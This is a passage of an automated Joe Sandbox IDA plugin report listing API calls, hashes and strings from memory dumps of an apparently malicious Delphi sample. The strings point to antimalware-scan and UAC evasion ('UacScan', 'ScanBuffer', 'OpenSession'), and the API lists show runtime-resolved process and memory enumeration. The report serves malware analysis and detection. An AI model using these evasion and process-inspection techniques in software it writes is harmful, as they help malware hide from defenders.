                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2796650324-0
                                                                                                                        • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                        • Instruction ID: a9db3406436e010b39dd26fcd0d6c35844e548252361633a938da95657345822
                                                                                                                        • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                        • Instruction Fuzzy Hash: BCE06D71A002148BCB14DE5888C0A4637D8AB08750F510569EC58EF34AD370ED208BE2
                                                                                                                        APIs
                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 029C7DB0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3934441357-0
                                                                                                                        • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                        • Instruction ID: 041ce29cf34a8b9461030b28850c37d3b65ea16c243a1f0edcf92493e0d4e83b
                                                                                                                        • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                        • Instruction Fuzzy Hash: 0ED05B723081107AD220A95E5D44EF75BDCCFC9770F10063DB698C3180D7208C018672
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,029DF8CC,ScanString,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8,UacScan,02A2137C,029EAFD8,UacInitialize), ref: 029C7E23
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                                                                        • Instruction ID: 59677d9a51fad8694a35c499defaef7ea608217b56f791c4c0ae50ca679f9a59
                                                                                                                        • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                                                                        • Instruction Fuzzy Hash: 8AC08CE33023000A5A5461FC0CC409A428C09881383B42B3DB038C72E2D33188126873
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,029E2A49,ScanString,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,Initialize), ref: 029C7E47
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                                                                        • Instruction ID: 7e755a576b30adbe00816e8c57d725a114483400a10d6344482446b66498c4b1
                                                                                                                        • Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                                                                        • Instruction Fuzzy Hash: 01C08CF23023040E5E9062FC1CC02DA428E09845343B02B29E038D71E2D32198222823
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3341692771-0
                                                                                                                        • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                                                        • Instruction ID: b3d0b2a4ba8b2e10e4fa19b46ed59ad9bb4c378a51794e210b41b13f9816c4f4
                                                                                                                        • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                                                        • Instruction Fuzzy Hash: BAC012A678022447EB315A98DCC0795A2CCDB49295B2410A5D408D7255E360DC004A66
                                                                                                                        APIs
                                                                                                                        • timeSetEvent.WINMM(00002710,00000000,029EBB44,00000000,00000001), ref: 029EBB60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Eventtime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2982266575-0
                                                                                                                        • Opcode ID: a31201e50ec6f48f3e73a460b28f931cc56a4267529f4fe0c60aa72e6b92cc11
                                                                                                                        • Instruction ID: 1a36be2979489c8e61679c920abb8ce024a6a6511982693a15f1dfd83dde0ad9
                                                                                                                        • Opcode Fuzzy Hash: a31201e50ec6f48f3e73a460b28f931cc56a4267529f4fe0c60aa72e6b92cc11
                                                                                                                        • Instruction Fuzzy Hash: 0EC092F0BD03003EFA2056A85CD2F2365CEE384B44FA0081ABA05EE2E1E6E258600A24
                                                                                                                        APIs
                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 029C4BEB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2525500382-0
                                                                                                                        • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                        • Instruction ID: b5de3cb78889e929d323545b806468c62898a350d62c4ffda331eb6934dcc8ee
                                                                                                                        • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                        • Instruction Fuzzy Hash: 29B0123C74820218FB1012610D10B3A008C0FA0287FB4209D9E29C80C4FF00C0008837
                                                                                                                        APIs
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 029C4C03
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3341692771-0
                                                                                                                        • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                        • Instruction ID: 17732d357f4bf200c91d8a0071169db7fde74d86d9601632f1225ef1b6e54b7d
                                                                                                                        • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                                                        • Instruction Fuzzy Hash: 3BA022EC2803030A8F0B232C80A002A203B3FE03003FAC0EC00000A0288F3AC000AC3A
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,029C1A03,?,029C2000), ref: 029C15E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,029C2000), ref: 029C16A4
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        APIs
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 029C1704
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1263568516-0
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,029DABE3,?,?,029DAC75,00000000,029DAD51), ref: 029DA970
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 029DA988
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 029DA99A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 029DA9AC
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 029DA9BE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 029DA9D0
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 029DA9E2
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 029DA9F4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 029DAA06
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 029DAA18
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 029DAA2A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 029DAA3C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 029DAA4E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 029DAA60
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 029DAA72
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 029DAA84
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 029DAA96
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                        • API String ID: 667068680-597814768
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,029C7338,029C0000,029ED790), ref: 029C58D1
                                                                                                                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029C58E8
                                                                                                                        • lstrcpynA.KERNEL32(?,?,?), ref: 029C5918
                                                                                                                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,029C7338,029C0000,029ED790), ref: 029C597C
                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,029C7338,029C0000,029ED790), ref: 029C59B2
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,029C7338,029C0000,029ED790), ref: 029C59C5
                                                                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,029C7338,029C0000,029ED790), ref: 029C59D7
                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029C7338,029C0000,029ED790), ref: 029C59E3
                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029C7338,029C0000), ref: 029C5A17
                                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029C7338), ref: 029C5A23
                                                                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 029C5A45
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                        • API String ID: 3245196872-1565342463
                                                                                                                        APIs
                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 029C5B94
                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 029C5BA1
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 029C5BA7
                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 029C5BD2
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029C5C19
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029C5C29
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029C5C51
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029C5C61
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 029C5C87
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 029C5C97
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                        • API String ID: 1599918012-2375825460
                                                                                                                        APIs
                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 029C7F7D
                                                                                                                        Similarity
                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1705453755-0
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029CA76A
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        APIs
                                                                                                                        • GetVersionExA.KERNEL32(?,029EC106,00000000,029EC11E), ref: 029CB722
                                                                                                                        Similarity
                                                                                                                        • API ID: Version
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1889659487-0
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,029CBDFA,00000000,029CC013,?,?,00000000,00000000), ref: 029CA7AB
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 481472006-0
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 029CD225
                                                                                                                          • Part of subcall function 029CD1F0: GetProcAddress.KERNEL32(00000000), ref: 029CD209
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                        • API String ID: 1646373207-1918263038
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 029D6E66
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 029D6E77
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 029D6E87
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 029D6E97
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 029D6EA7
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 029D6EB7
                                                                                                                        • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 029D6EC7
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                        • API String ID: 667068680-2233174745
                                                                                                                        APIs
                                                                                                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029C28CE
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                        • API String ID: 2030045667-32948583
                                                                                                                        • Opcode ID: 3742fb4401b4e5de70a67974404fd9fe757c61a33189f38b3ac468f3b5a0d3bc
                                                                                                                        • Instruction ID: aca542ad5797af26e24d9b90f4d4cc539a2b9b7a6ed4c07a1a6a42766c2be988
                                                                                                                        • Opcode Fuzzy Hash: 3742fb4401b4e5de70a67974404fd9fe757c61a33189f38b3ac468f3b5a0d3bc
                                                                                                                        • Instruction Fuzzy Hash: 21A1D330E043948BDB21AB2CCC84B99B6E9EB49750F2440F9DD49AB386CF759985CF52
                                                                                                                        Strings
                                                                                                                        • An unexpected memory leak has occurred. , xrefs: 029C2690
                                                                                                                        • The unexpected small block leaks are:, xrefs: 029C2707
                                                                                                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 029C2849
                                                                                                                        • , xrefs: 029C2814
                                                                                                                        • bytes: , xrefs: 029C275D
                                                                                                                        • Unexpected Memory Leak, xrefs: 029C28C0
                                                                                                                        • 7, xrefs: 029C26A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                        • API String ID: 0-2723507874
                                                                                                                        • Opcode ID: 71874c310898fdff6a34da30d207bfc2f13abab31681b9129e1f0ede12ebbb9b
                                                                                                                        • Instruction ID: 226e42f1e5d56b7d5cae8dd119779e86c3f62c6592ddf3aecc69de1fc3af70b0
                                                                                                                        • Opcode Fuzzy Hash: 71874c310898fdff6a34da30d207bfc2f13abab31681b9129e1f0ede12ebbb9b
                                                                                                                        • Instruction Fuzzy Hash: 7D71A330E042988FDB21EB2CCC84B99BAE9EB49754F2041E9D9499B281DF754AC5CF52
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(00000000,029CC013,?,?,00000000,00000000), ref: 029CBD7E
                                                                                                                          • Part of subcall function 029CA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029CA76A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                        • API String ID: 4232894706-2493093252
                                                                                                                        • Opcode ID: 9fde01a6350bdc980a9953e2817079f2c907db9f6f86896dca05c335cb6e426c
                                                                                                                        • Instruction ID: 463c029e5c5ec361e6536d9a8e657e73c20ba9d1fd10f34a22690d4048fba0a8
                                                                                                                        • Opcode Fuzzy Hash: 9fde01a6350bdc980a9953e2817079f2c907db9f6f86896dca05c335cb6e426c
                                                                                                                        • Instruction Fuzzy Hash: E7613435B002489BDB00EBB8D86069FB7FBABD9300F70943D9105AB745DA35D9098FA7
                                                                                                                        APIs
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 029DAE40
                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 029DAE57
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 029DAEEB
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 029DAEF7
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 029DAF0B
                                                                                                                        Strings
